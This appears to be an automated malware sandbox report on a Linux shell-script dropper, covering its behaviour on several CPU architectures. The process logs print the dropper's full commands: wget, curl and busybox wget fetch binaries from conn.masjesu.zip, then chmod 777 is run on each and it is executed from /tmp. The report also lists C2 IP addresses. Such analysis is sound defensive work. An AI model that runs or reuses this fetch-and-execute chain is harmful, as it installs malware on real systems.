Analysis Overview
SHA256
19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912
Threat Level: Shows suspicious behavior
The file 19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:12
Reported
2024-10-25 01:14
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| GB | 195.181.164.19:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:12
Reported
2024-10-25 01:14
Platform
debian9-armhf-20240729-en
Max time kernel
148s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:12
Reported
2024-10-25 01:15
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH | /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH | N/A |
| N/A | /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h | /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h | N/A |
| N/A | /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM | /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM | N/A |
| N/A | /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd | /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd | N/A |
| N/A | /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM | /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM | N/A |
| N/A | /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI | /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI | N/A |
| N/A | /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG | /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG | N/A |
| N/A | /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B | /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B | N/A |
| N/A | /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg | /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg | N/A |
| N/A | /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj | /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj | N/A |
| N/A | /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy | /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy | N/A |
| N/A | /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc | /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc | /usr/bin/curl | N/A |
Processes
/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh
[/tmp/19a71eb81c8fd44171b07fe5b4f687a33a8188058d345e567bea9cae37fcf912.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/bin/chmod
[chmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
[./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/bin/rm
[rm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/bin/chmod
[chmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h
[./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/bin/rm
[rm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/bin/chmod
[chmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM
[./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/bin/rm
[rm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/bin/chmod
[chmod 777 Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd
[./Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/bin/rm
[rm Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/bin/chmod
[chmod 777 SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM
[./SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/bin/rm
[rm SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/bin/chmod
[chmod 777 EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI
[./EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/bin/rm
[rm EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/bin/chmod
[chmod 777 v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG
[./v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/bin/rm
[rm v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/bin/chmod
[chmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B
[./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/bin/rm
[rm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/bin/chmod
[chmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg
[./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/bin/rm
[rm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/bin/chmod
[chmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj
[./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/bin/rm
[rm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/bin/chmod
[chmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy
[./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/bin/rm
[rm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/bin/chmod
[chmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc
[./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/bin/rm
[rm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:12
Reported
2024-10-25 01:14
Platform
debian9-mipsel-20240418-en
Max time kernel
103s
Max time network
105s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH | /tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH | N/A |
| N/A | /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h | /tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h | N/A |
| N/A | /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM | /tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM | N/A |
| N/A | /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd | /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd | N/A |
| N/A | /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM | /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM | N/A |
| N/A | /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI | /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI | N/A |
| N/A | /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG | /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG | N/A |
| N/A | /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B | /tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B | N/A |
| N/A | /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg | /tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg | N/A |
| N/A | /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj | /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj | N/A |
| N/A | /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy | /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy | N/A |
| N/A | /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc | /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc | N/A |
| N/A | /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 | /tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5 | N/A |
| N/A | /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw | /tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw | N/A |
| N/A | /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd | /tmp/Vcjdj0XuQTaNEPMpTFyEL5k0eOnGHaDuJd | N/A |
| N/A | /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM | /tmp/SjyjmGflw0egcp8d0nmWVBxaDRQ7dfaWtM | N/A |
| N/A | /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI | /tmp/EVhdGSzJ8XafWYyWC9UhSMEVlr7kcvP0pI | N/A |
| N/A | /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG | /tmp/v7o2vu9VOSYr9RFaaxFn58alzY9ZcADZkG | N/A |
| N/A | /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj | /tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj | N/A |
| N/A | /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy | /tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy | N/A |
| N/A | /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc | /tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc | N/A |
